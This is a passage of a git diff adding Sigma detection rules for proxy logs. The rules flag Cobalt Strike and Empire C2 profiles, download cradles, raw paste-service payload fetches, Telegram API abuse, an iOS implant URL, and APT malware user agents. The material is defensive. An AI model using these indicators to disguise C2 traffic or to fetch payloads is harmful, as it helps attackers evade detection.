)' + - 'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08' + selection2: + c-useragent|endswith: '; MANM; MANM)' + condition: 1 of selection* +falsepositives: + - Unknown +level: critical +tags: + - attack.defense_evasion + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_cobalt_ocsp.yml b/bin/main/rules/others_proxy/proxy_cobalt_ocsp.yml new file mode 100644 index 000000000..8c95eb010 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_cobalt_ocsp.yml @@ -0,0 +1,23 @@ +title: CobaltStrike Malleable (OCSP) Profile +id: 37325383-740a-403d-b1a2-b2b4ab7992e7 +status: test +description: Detects Malleable (OCSP) Profile with Typo (OSCP) in URL +author: Markus Neis +references: + - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/ocsp.profile +date: 2019/11/12 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-uri|contains: '/oscp/' + cs-host: 'ocsp.verisign.com' + condition: selection +falsepositives: + - Unknown +level: high +tags: + - attack.defense_evasion + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_cobalt_onedrive.yml b/bin/main/rules/others_proxy/proxy_cobalt_onedrive.yml new file mode 100644 index 000000000..e3e605417 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_cobalt_onedrive.yml @@ -0,0 +1,27 @@ +title: CobaltStrike Malleable OneDrive Browsing Traffic Profile +id: c9b33401-cc6a-4cf6-83bb-57ddcb2407fc +status: test +description: Detects Malleable OneDrive Profile +author: Markus Neis +references: + - https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/onedrive_getonly.profile +date: 2019/11/12 +modified: 2022/01/07 +logsource: + category: proxy +detection: + selection: + cs-method: 'GET' + c-uri|endswith: '?manifest=wac' + cs-host: 'onedrive.live.com' + filter: + c-uri|startswith: 'http' + c-uri|contains: '://onedrive.live.com/' + condition: selection and not filter +falsepositives: + - Unknown +level: high +tags: + - attack.defense_evasion + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_download_susp_dyndns.yml b/bin/main/rules/others_proxy/proxy_download_susp_dyndns.yml new file mode 100644 index 000000000..995af3374 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_download_susp_dyndns.yml @@ -0,0 +1,115 @@ +title: Download from Suspicious Dyndns Hosts +id: 195c1119-ef07-4909-bb12-e66f5e07bf3c +status: test +description: Detects download of certain file types from hosts with dynamic DNS names (selected list) +author: Florian Roth +references: + - https://www.alienvault.com/blogs/security-essentials/dynamic-dns-security-and-potential-threats +date: 2017/11/08 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-uri-extension: + - 'exe' + - 'vbs' + - 'bat' + - 'rar' + - 'ps1' + - 'doc' + - 'docm' + - 'xls' + - 'xlsm' + - 'pptm' + - 'rtf' + - 'hta' + - 'dll' + - 'ws' + - 'wsf' + - 'sct' + - 'zip' + # If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/ + r-dns|endswith: + - '.hopto.org' + - '.no-ip.org' + - '.no-ip.info' + - '.no-ip.biz' + - '.no-ip.com' + - '.noip.com' + - '.ddns.name' + - '.myftp.org' + - '.myftp.biz' + - '.serveblog.net' + - '.servebeer.com' + - '.servemp3.com' + - '.serveftp.com' + - '.servequake.com' + - '.servehalflife.com' + - '.servehttp.com' + - '.servegame.com' + - '.servepics.com' + - '.myvnc.com' + - '.ignorelist.com' + - '.jkub.com' + - '.dlinkddns.com' + - '.jumpingcrab.com' + - '.ddns.info' + - '.mooo.com' + - '.dns-dns.com' + - '.strangled.net' + - '.adultdns.net' + - '.craftx.biz' + - '.ddns01.com' + - '.dns53.biz' + - '.dnsapi.info' + - '.dnsd.info' + - '.dnsdynamic.com' + - '.dnsdynamic.net' + - '.dnsget.org' + - '.fe100.net' + - '.flashserv.net' + - '.ftp21.net' + - '.http01.com' + - '.http80.info' + - '.https443.com' + - '.imap01.com' + - '.kadm5.com' + - '.mysq1.net' + - '.ns360.info' + - '.ntdll.net' + - '.ole32.com' + - '.proxy8080.com' + - '.sql01.com' + - '.ssh01.com' + - '.ssh22.net' + - '.tempors.com' + - '.tftpd.net' + - '.ttl60.com' + - '.ttl60.org' + - '.user32.com' + - '.voip01.com' + - '.wow64.net' + - '.x64.me' + - '.xns01.com' + - '.dyndns.org' + - '.dyndns.info' + - '.dyndns.tv' + - '.dyndns-at-home.com' + - '.dnsomatic.com' + - '.zapto.org' + - '.webhop.net' + - '.25u.com' + - '.slyip.net' + condition: selection +fields: + - cs-ip + - c-uri +falsepositives: + - Software downloads +level: medium +tags: + - attack.defense_evasion + - attack.command_and_control + - attack.t1105 + - attack.t1568 diff --git a/bin/main/rules/others_proxy/proxy_download_susp_tlds_blacklist.yml b/bin/main/rules/others_proxy/proxy_download_susp_tlds_blacklist.yml new file mode 100644 index 000000000..f5374e960 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_download_susp_tlds_blacklist.yml @@ -0,0 +1,115 @@ +title: Download from Suspicious TLD +id: 00d0b5ab-1f55-4120-8e83-487c0a7baf19 +status: test +description: Detects download of certain file types from hosts in suspicious TLDs +author: Florian Roth +references: + - https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap + - https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf + - https://www.spamhaus.org/statistics/tlds/ + - https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/ +date: 2017/11/07 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-uri-extension: + - 'exe' + - 'vbs' + - 'bat' + - 'rar' + - 'ps1' + - 'doc' + - 'docm' + - 'xls' + - 'xlsm' + - 'pptm' + - 'rtf' + - 'hta' + - 'dll' + - 'ws' + - 'wsf' + - 'sct' + - 'zip' + # If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/ + r-dns|endswith: + # Symantec / Chris Larsen analysis + - '.country' + - '.stream' + - '.gdn' + - '.mom' + - '.xin' + - '.kim' + - '.men' + - '.loan' + - '.download' + - '.racing' + - '.online' + - '.science' + - '.ren' + - '.gb' + - '.win' + - '.top' + - '.review' + - '.vip' + - '.party' + - '.tech' + - '.xyz' + - '.date' + - '.faith' + - '.zip' + - '.cricket' + - '.space' + # McAfee report + - '.info' + - '.vn' + - '.cm' + - '.am' + - '.cc' + - '.asia' + - '.ws' + - '.tk' + - '.biz' + - '.su' + - '.st' + - '.ro' + - '.ge' + - '.ms' + - '.pk' + - '.nu' + - '.me' + - '.ph' + - '.to' + - '.tt' + - '.name' + - '.tv' + - '.kz' + - '.tc' + - '.mobi' + # Spamhaus + - '.study' + - '.click' + - '.link' + - '.trade' + - '.accountant' + # Spamhaus 2018 https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/ + - '.cf' + - '.gq' + - '.ml' + - '.ga' + # Custom + - '.pw' + condition: selection +fields: + - ClientIP + - c-uri +falsepositives: + - All kinds of software downloads +level: low +tags: + - attack.initial_access + - attack.t1566 + - attack.execution + - attack.t1203 + - attack.t1204.002 diff --git a/bin/main/rules/others_proxy/proxy_download_susp_tlds_whitelist.yml b/bin/main/rules/others_proxy/proxy_download_susp_tlds_whitelist.yml new file mode 100644 index 000000000..268fd3abb --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_download_susp_tlds_whitelist.yml @@ -0,0 +1,64 @@ +title: Download EXE from Suspicious TLD +id: b5de2919-b74a-4805-91a7-5049accbaefe +status: test +description: Detects executable downloads from suspicious remote systems +author: Florian Roth +date: 2017/03/13 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-uri-extension: + - 'exe' + - 'vbs' + - 'bat' + - 'rar' + - 'ps1' + - 'doc' + - 'docm' + - 'xls' + - 'xlsm' + - 'pptm' + - 'rtf' + - 'hta' + - 'dll' + - 'ws' + - 'wsf' + - 'sct' + - 'zip' + # If you want to add more extensions - see https://docs.google.com/spreadsheets/d/1TWS238xacAto-fLKh1n5uTsdijWdCEsGIM0Y0Hvmc5g/ + filter: + r-dns|endswith: + - '.com' + - '.org' + - '.net' + - '.edu' + - '.gov' + - '.uk' + - '.ca' + - '.de' + - '.jp' + - '.fr' + - '.au' + - '.us' + - '.ch' + - '.it' + - '.nl' + - '.se' + - '.no' + - '.es' + # Extend this list as needed + condition: selection and not filter +fields: + - ClientIP + - c-uri +falsepositives: + - All kind of software downloads +level: low +tags: + - attack.initial_access + - attack.t1566 + - attack.execution + - attack.t1203 + - attack.t1204.002 diff --git a/bin/main/rules/others_proxy/proxy_downloadcradle_webdav.yml b/bin/main/rules/others_proxy/proxy_downloadcradle_webdav.yml new file mode 100644 index 000000000..a619b015a --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_downloadcradle_webdav.yml @@ -0,0 +1,29 @@ +title: Windows WebDAV User Agent +id: e09aed7a-09e0-4c9a-90dd-f0d52507347e +status: test +description: Detects WebDav DownloadCradle +author: Florian Roth +references: + - https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html +date: 2018/04/06 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-useragent|startswith: 'Microsoft-WebDAV-MiniRedir/' + cs-method: 'GET' + condition: selection +fields: + - ClientIP + - c-uri + - c-useragent + - cs-method +falsepositives: + - Administrative scripts that download files from the Internet + - Administrative scripts that retrieve certain website contents + - Legitimate WebDAV administration +level: high +tags: + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_empire_ua_uri_combos.yml b/bin/main/rules/others_proxy/proxy_empire_ua_uri_combos.yml new file mode 100644 index 000000000..7f027bfb2 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_empire_ua_uri_combos.yml @@ -0,0 +1,30 @@ +title: Empire UserAgent URI Combo +id: b923f7d6-ac89-4a50-a71a-89fb846b4aa8 +status: test +description: Detects user agent and URI paths used by empire agents +author: Florian Roth +references: + - https://github.com/BC-SECURITY/Empire +date: 2020/07/13 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-useragent: 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko' + cs-uri-query: + - '/admin/get.php' + - '/news.php' + - '/login/process.php' + cs-method: 'POST' + condition: selection +fields: + - c-uri + - c-ip +falsepositives: + - Valid requests with this exact user agent to server scripts of the defined names +level: high +tags: + - attack.defense_evasion + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_empty_ua.yml b/bin/main/rules/others_proxy/proxy_empty_ua.yml new file mode 100644 index 000000000..5cd3357fe --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_empty_ua.yml @@ -0,0 +1,27 @@ +title: Empty User Agent +id: 21e44d78-95e7-421b-a464-ffd8395659c4 +status: test +description: Detects suspicious empty user agent strings in proxy logs +author: Florian Roth +references: + - https://twitter.com/Carlos_Perez/status/883455096645931008 +date: 2017/07/08 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + # Empty string - as used by Powershell's (New-Object Net.WebClient).DownloadString + c-useragent: '' + condition: selection +fields: + - ClientIP + - c-uri + - c-useragent +falsepositives: + - Unknown +level: medium +tags: + - attack.defense_evasion + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_ios_implant.yml b/bin/main/rules/others_proxy/proxy_ios_implant.yml new file mode 100644 index 000000000..a86801b78 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_ios_implant.yml @@ -0,0 +1,32 @@ +title: iOS Implant URL Pattern +id: e06ac91d-b9e6-443d-8e5b-af749e7aa6b6 +status: test +description: Detects URL pattern used by iOS Implant +author: Florian Roth +references: + - https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html + - https://twitter.com/craiu/status/1167358457344925696 +date: 2019/08/30 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-uri|contains: '/list/suc?name=' + condition: selection +fields: + - ClientIP + - c-uri + - c-useragent +falsepositives: + - Unknown +level: critical +tags: + - attack.execution + - attack.t1203 + - attack.collection + - attack.t1005 + - attack.t1119 + - attack.credential_access + - attack.t1528 + - attack.t1552.001 diff --git a/bin/main/rules/others_proxy/proxy_java_class_download.yml b/bin/main/rules/others_proxy/proxy_java_class_download.yml new file mode 100644 index 000000000..66c3ff4bd --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_java_class_download.yml @@ -0,0 +1,19 @@ +title: Java Class Proxy Download +id: 53c15703-b04c-42bb-9055-1937ddfb3392 +status: experimental +description: Detects Java class download in proxy logs, e.g. used in Log4shell exploitation attacks against Log4j. +references: + - https://www.lunasec.io/docs/blog/log4j-zero-day/ +author: Andreas Hunkeler (@Karneades) +date: 2021/12/21 +tags: + - attack.initial_access +logsource: + category: proxy +detection: + selection: + c-uri|endswith: '.class' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/others_proxy/proxy_powershell_ua.yml b/bin/main/rules/others_proxy/proxy_powershell_ua.yml new file mode 100644 index 000000000..60c74b5a5 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_powershell_ua.yml @@ -0,0 +1,27 @@ +title: Windows PowerShell User Agent +id: c8557060-9221-4448-8794-96320e6f3e74 +status: test +description: Detects Windows PowerShell Web Access +author: Florian Roth +references: + - https://msdn.microsoft.com/powershell/reference/5.1/microsoft.powershell.utility/Invoke-WebRequest +date: 2017/03/13 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-useragent|contains: ' WindowsPowerShell/' + condition: selection +fields: + - ClientIP + - c-uri + - c-useragent +falsepositives: + - Administrative scripts that download files from the Internet + - Administrative scripts that retrieve certain website contents +level: medium +tags: + - attack.defense_evasion + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_pwndrop.yml b/bin/main/rules/others_proxy/proxy_pwndrop.yml new file mode 100644 index 000000000..d9b6569a2 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_pwndrop.yml @@ -0,0 +1,27 @@ +title: PwnDrp Access +id: 2b1ee7e4-89b6-4739-b7bb-b811b6607e5e +status: test +description: Detects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity +author: Florian Roth +references: + - https://breakdev.org/pwndrop/ +date: 2020/04/15 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-uri|contains: '/pwndrop/' + condition: selection +fields: + - ClientIP + - c-uri + - c-useragent +falsepositives: + - Unknown +level: critical +tags: + - attack.command_and_control + - attack.t1071.001 + - attack.t1102.001 + - attack.t1102.003 diff --git a/bin/main/rules/others_proxy/proxy_raw_paste_service_access.yml b/bin/main/rules/others_proxy/proxy_raw_paste_service_access.yml new file mode 100644 index 000000000..9135f5e4c --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_raw_paste_service_access.yml @@ -0,0 +1,32 @@ +title: Raw Paste Service Access +id: 5468045b-4fcc-4d1a-973c-c9c9578edacb +status: test +description: Detects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form +author: Florian Roth +references: + - https://www.virustotal.com/gui/domain/paste.ee/relations +date: 2019/12/05 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-uri|contains: + - '.paste.ee/r/' + - '.pastebin.com/raw/' + - '.hastebin.com/raw/' + - '.ghostbin.co/paste/*/raw/' + condition: selection +fields: + - ClientIP + - c-uri + - c-useragent +falsepositives: + - User activity (e.g. developer that shared and copied code snippets and used the raw link instead of just copy & paste) +level: high +tags: + - attack.command_and_control + - attack.t1071.001 + - attack.t1102.001 + - attack.t1102.003 + - attack.defense_evasion diff --git a/bin/main/rules/others_proxy/proxy_susp_flash_download_loc.yml b/bin/main/rules/others_proxy/proxy_susp_flash_download_loc.yml new file mode 100644 index 000000000..3277e1224 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_susp_flash_download_loc.yml @@ -0,0 +1,28 @@ +title: Flash Player Update from Suspicious Location +id: 4922a5dd-6743-4fc2-8e81-144374280997 +status: test +description: Detects a flashplayer update from an unofficial location +author: Florian Roth +references: + - https://gist.github.com/roycewilliams/a723aaf8a6ac3ba4f817847610935cfb +date: 2017/10/25 +modified: 2022/01/07 +logsource: + category: proxy +detection: + selection: + - c-uri-query|contains: '/flash_install.php' + - c-uri-query|endswith: '/install_flash_player.exe' + filter: + c-uri-stem|contains: '.adobe.com/' + condition: selection and not filter +falsepositives: + - Unknown flash download locations +level: high +tags: + - attack.initial_access + - attack.t1189 + - attack.execution + - attack.t1204.002 + - attack.defense_evasion + - attack.t1036.005 diff --git a/bin/main/rules/others_proxy/proxy_telegram_api.yml b/bin/main/rules/others_proxy/proxy_telegram_api.yml new file mode 100644 index 000000000..c2a5ac293 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_telegram_api.yml @@ -0,0 +1,34 @@ +title: Telegram API Access +id: b494b165-6634-483d-8c47-2026a6c52372 +status: test +description: Detects suspicious requests to Telegram API without the usual Telegram User-Agent +author: Florian Roth +references: + - https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/ + - https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/ + - https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/ +date: 2018/06/05 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + r-dns: 'api.telegram.org' # Often used by Bots + filter: + c-useragent|contains: + # Used https://core.telegram.org/bots/samples for this list + - 'Telegram' + - 'Bot' + condition: selection and not filter +fields: + - ClientIP + - c-uri + - c-useragent +falsepositives: + - Legitimate use of Telegram bots in the company +level: medium +tags: + - attack.defense_evasion + - attack.command_and_control + - attack.t1071.001 + - attack.t1102.002 diff --git a/bin/main/rules/others_proxy/proxy_turla_comrat.yml b/bin/main/rules/others_proxy/proxy_turla_comrat.yml new file mode 100644 index 000000000..c546ddb69 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_turla_comrat.yml @@ -0,0 +1,23 @@ +title: Turla ComRAT +id: 7857f021-007f-4928-8b2c-7aedbe64bb82 +status: test +description: Detects Turla ComRAT patterns +author: Florian Roth +references: + - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf +date: 2020/05/26 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-uri|contains: '/index/index.php?h=' + condition: selection +falsepositives: + - Unknown +level: high +tags: + - attack.defense_evasion + - attack.command_and_control + - attack.t1071.001 + - attack.g0010 diff --git a/bin/main/rules/others_proxy/proxy_ua_apt.yml b/bin/main/rules/others_proxy/proxy_ua_apt.yml new file mode 100644 index 000000000..34eaba226 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_ua_apt.yml @@ -0,0 +1,65 @@ +title: APT User Agent +id: 6ec820f2-e963-4801-9127-d8b2dce4d31b +status: test +description: Detects suspicious user agent strings used in APT malware in proxy logs +author: Florian Roth, Markus Neis +references: + - Internal Research +date: 2019/11/12 +modified: 2021/11/30 +logsource: + category: proxy +detection: + selection: + c-useragent: + # APT Related + - 'SJZJ (compatible; MSIE 6.0; Win32)' # APT Backspace + - 'Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0' # APT GrizzlySteppe - ChopStick - US CERT https://goo.gl/1DTHwi + - 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC' # Comment Crew Miniasp + - 'Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)' # Comment Crew Miniasp + - 'webclient' # Naikon APT + - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200' # Naikon APT + - 'Mozilla/4.0 (compatible; MSI 6.0;' # SnowGlobe Babar - yes, it is cut + - 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0' # Sofacy - Xtunnel + - 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/' # Sofacy - Xtunnel + - 'Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2' # Sofacy - Xtunnel + - 'Mozilla/4.0' # Derusbi backdoor ELF https://github.com/fideliscyber/indicators/tree/master/FTA-1021 + - 'Netscape' # Unit78020 Malware + - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7' # Unit78020 Malware + - 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Firefox/3.6.13 GTB7.1' # Winnti related + - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)' # Winnti related + - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)' # APT17 + - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)' # Bronze Butler - Daserf + - 'Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)' # Bronze Butler - Daserf + - 'Mozilla/4.0 (compatible; MSIE 8.0; Win32)' # TSCookie https://app.any.run/tasks/0996b314-5133-491b-8d23-d431ffdec597 + - 'Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1' # Delphi downloader https://www.welivesecurity.com/2018/04/24/sednit-update-analysis-zebrocy/ + - 'Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)' # VPNFilter https://blog.talosintelligence.com/2018/05/VPNFilter.html + - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)' # Sofacy User-Agent https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/ + - 'Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko' # Sofacy User-Agent https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/ + - 'Mozilla v5.1 *' # Sofacy Zebrocy samples + - 'MSIE 8.0' # Sofacy Azzy Backdoor from https://www.hybrid-analysis.com/sample/a80e29c0757bee05338fd5c22a542d852ad86c477068e3eb4aacc1c3e59e2eef?environmentId=100 + - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)' # https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html + - 'Mozilla/4.0 (compatible; RMS)' # Attacks on industrial enterprises using RMS and TeamViewer https://goo.gl/GthvTw + - 'Mozilla/4.0 (compatible; MSIE 6.0; DynGate)' # Attacks on industrial enterprises using RMS and TeamViewer https://goo.gl/GthvTw + - 'O/9.27 (W; U; Z)' # Cmstar https://www.virustotal.com/#/file/e4328011bb2b04abc856ccd04404c9f95d67167f6c291d343e8ffa8aa2aa2099/details + - 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0*' # KerrDown UA https://goo.gl/s2WU6o + - 'Mozilla/5.0 (Windows NT 9; *' # Suspicious 'Windows NT 9' user agent - used by APT33 malware in 2018 + - 'hots scot' # Unknown iOS zero-day implant https://twitter.com/craiu/status/1176437994288484352?s=20 + - 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT)' # https://blog.telsy.com/meeting-powerband-the-apt33-net-powerton-variant/ + - 'Mozilla/5.0 (Windows NT 6.1; WOW64) Chrome/28.0.1500.95 Safari/537.36' # Hidden Cobra malware + - 'Mozilla/5.0 (Windows NT 6.2; Win32; rv:47.0)' # Strong Pity loader https://twitter.com/VK_Intel/status/1264185981118406657 + - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1;' # Mustang Panda https://insights.oem.avira.com/new-wave-of-plugx-targets-hong-kong/ + - 'Mozilla/5.0 (X11; Linux i686; rv:22.0) Firefox/22.0' # BackdoorDiplomacy https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/ + - 'Mozilla/5.0 Chrome/72.0.3626.109 Safari/537.36' # SideWalk malware used by Sparkling Goblin + - 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:FTS_06) Gecko/22.36.35.06 Firefox/2.0' # LitePower stager used by WRITE https://securelist.com/wirtes-campaign-in-the-middle-east-living-off-the-land-since-at-least-2019/105044/ + condition: selection +fields: + - ClientIP + - c-uri + - c-useragent +falsepositives: + - Old browsers +level: high +tags: + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_ua_bitsadmin_susp_ip.yml b/bin/main/rules/others_proxy/proxy_ua_bitsadmin_susp_ip.yml new file mode 100644 index 000000000..3d7648457 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_ua_bitsadmin_susp_ip.yml @@ -0,0 +1,32 @@ +title: Bitsadmin to Uncommon IP Server Address +id: 8ccd35a2-1c7c-468b-b568-ac6cdf80eec3 +status: experimental +description: Detects Bitsadmin connections to IP addresses instead of FQDN names +author: Florian Roth +date: 2022/06/10 +logsource: + category: proxy +detection: + selection: + c-useragent|startswith: 'Microsoft BITS/' + cs-host|startswith: + - '1' + - '2' + - '3' + - '4' + - '5' + - '6' + - '7' + - '8' + - '9' + condition: selection +falsepositives: + - Unknown +level: high +tags: + - attack.command_and_control + - attack.t1071.001 + - attack.defense_evasion + - attack.persistence + - attack.t1197 + - attack.s0190 diff --git a/bin/main/rules/others_proxy/proxy_ua_bitsadmin_susp_tld.yml b/bin/main/rules/others_proxy/proxy_ua_bitsadmin_susp_tld.yml new file mode 100644 index 000000000..2264b0d86 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_ua_bitsadmin_susp_tld.yml @@ -0,0 +1,33 @@ +title: Bitsadmin to Uncommon TLD +id: 9eb68894-7476-4cd6-8752-23b51f5883a7 +status: experimental +description: Detects Bitsadmin connections to domains with uncommon TLDs - https://twitter.com/jhencinski/status/1102695118455349248 - https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/ +author: Florian Roth, Tim Shelton +date: 2019/03/07 +modified: 2022/05/09 +logsource: + category: proxy +detection: + selection: + c-useragent|startswith: 'Microsoft BITS/' + falsepositives: + r-dns|endswith: + - '.com' + - '.net' + - '.org' + - '.scdn.co' # spotify streaming + condition: selection and not falsepositives +fields: + - ClientIP + - c-uri + - c-useragent +falsepositives: + - Rare programs that use Bitsadmin and update from regional TLDs e.g. .uk or .ca +level: high +tags: + - attack.command_and_control + - attack.t1071.001 + - attack.defense_evasion + - attack.persistence + - attack.t1197 + - attack.s0190 diff --git a/bin/main/rules/others_proxy/proxy_ua_cryptominer.yml b/bin/main/rules/others_proxy/proxy_ua_cryptominer.yml new file mode 100644 index 000000000..538a3a6be --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_ua_cryptominer.yml @@ -0,0 +1,30 @@ +title: Crypto Miner User Agent +id: fa935401-513b-467b-81f4-f9e77aa0dd78 +status: test +description: Detects suspicious user agent strings used by crypto miners in proxy logs +author: Florian Roth +references: + - https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65 + - https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h +date: 2019/10/21 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-useragent|startswith: + # XMRig + - 'XMRig ' + # CCMiner + - 'ccminer' + condition: selection +fields: + - ClientIP + - c-uri + - c-useragent +falsepositives: + - Unknown +level: high +tags: + - attack.command_and_control + - attack.t1071.001 diff --git a/bin/main/rules/others_proxy/proxy_ua_frameworks.yml b/bin/main/rules/others_proxy/proxy_ua_frameworks.yml new file mode 100644 index 000000000..3601ab068 --- /dev/null +++ b/bin/main/rules/others_proxy/proxy_ua_frameworks.yml @@ -0,0 +1,58 @@ +title: Exploit Framework User Agent +id: fdd1bfb5-f60b-4a35-910e-f36ed3d0b32f +status: test +description: Detects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs +author: Florian Roth +references: + - https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/ +date: 2017/07/08 +modified: 2021/11/27 +logsource: + category: proxy +detection: + selection: + c-useragent: + # Cobalt Strike https://www.cobaltstrike.com/help-malleable-c2 + - 'Internet Explorer *' + - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)' # https://goo.gl/f4H5Ez + + # Metasploit Framework - Analysis by Didier Stevens https://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/ + - 'Mozilla/4.0 (compatible; Metasploit RSPEC)' + - 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' + - 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' # old browser, rare, base-lining needed + - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' # old browser, rare, base-lining needed + - 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)' # old browser, rare, base-lining needed + - 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; 